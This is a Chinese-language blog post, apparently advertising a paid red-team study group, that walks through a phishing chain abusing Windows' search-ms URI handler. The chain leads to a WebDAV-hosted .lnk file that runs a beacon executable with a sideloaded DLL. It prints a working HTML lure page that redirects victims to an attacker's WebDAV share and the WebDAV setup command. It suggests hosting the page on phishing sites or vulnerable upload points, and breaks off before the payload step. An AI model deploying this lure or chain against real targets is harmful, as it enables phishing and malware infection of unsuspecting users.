欢迎加入我的知识星球,目前正在更新域和攻防相关的文章,后续会跟更免杀的东西,99/永久。
你买的到的不仅仅是星球内的资源,更是群内的氛围,群内杜绝划水,杜绝聊和技术无关的事情。
加我VX进入:
一些资源的截图:
我们的攻击链如下:
Email --> invoice.pdf --> 包含一个链接 --> search-ms:query=decoy&crumb=location:\\\\127.0.0.1@5000\\dec&displayname=Hello, is it me you\'re looking for? --> invoice.lnk --> beacon.exe --> beacon.dll这里email邮件我们就不发了,我们直接从包含一个链接这里开始。
如下是老外的示例网站:
https://dav.binary-offensive.com/webdav/searchms.html当我们去访问的时候他会要求我们打开资源管理器。
我们先点击取消,右键查看源代码。
可以看到这里是通过search-ms:query=test&crumb的方式来打开远程服务器上的文件,并且只会显示test命名的文件。
其实这里的search-ms:query=test&crumb和我们直接使用exploerer.exe打开是差不多的。
我们现在点击打开。
可以看到他会自动打开资源管理器,里面只会显示一个test命名的文件,其他文件是不会显示的。
那么我们在想如果说我们自己去搭建一个这样的html页面,然后我们只显示lnk文件其他文件都不显示的话,当目标点击lnk文件的时候会执行我们的白程序,然后去调用我们的黑dll。
但是在这之前我们需要去搭建一个WebDav 来托管我们的文件。
安装如下:
apt install python3-wsgidav然后我们就可以直接使用了。
现在我们还需要去仿照老外的页面去做一个一模一样的页面即可。
如下代码:
这里的192.168.177.132是我的kali ip。dec是我的目录,这里的query参数查询的是以lnk命名文件。
<html><head><title>search-ms</title><script>window.location.href = 'search-ms:query=lnk&crumb=location:\\\\192.168.177.132@5000\\dec&displayname=Hello, is it me you\'re looking for?';</script></head><body><center>PoC triggering Microsoft's <b>search-ms</b> URI handler to open up Explorer previewing attacker's WebDAV contents.</br>This is to lure victims into opening malicious files which could have led to their computers infection.<br/></center></body></html>
可以看到当我们去访问的时候他会提示我们是否打开这个页面,这里因为是本地,所以我们直接创建的html文件,然后双击打开的,所以这里是file://想要打开应用程序,一般的话我们挂在我们的钓鱼网站即可,或者挂载在比如说有漏洞的地方,可以上传html文件的地方都是可以的。
当我们去点击打开的时候。
可以看到他会显示一个1.lnk文件,因为这个文件我们对他什么都没做处理,所以是没有图标的。
如下可以看到我们的kali目录。
那么我们现在将免杀马或者白程序,这里我就为了简单所以我们直接将马放到dev这个目录,然后给lnk文件去加个图标,让lnk文件去执行我们的马。
本小节就先到这里,期待和您的下次相遇!!!
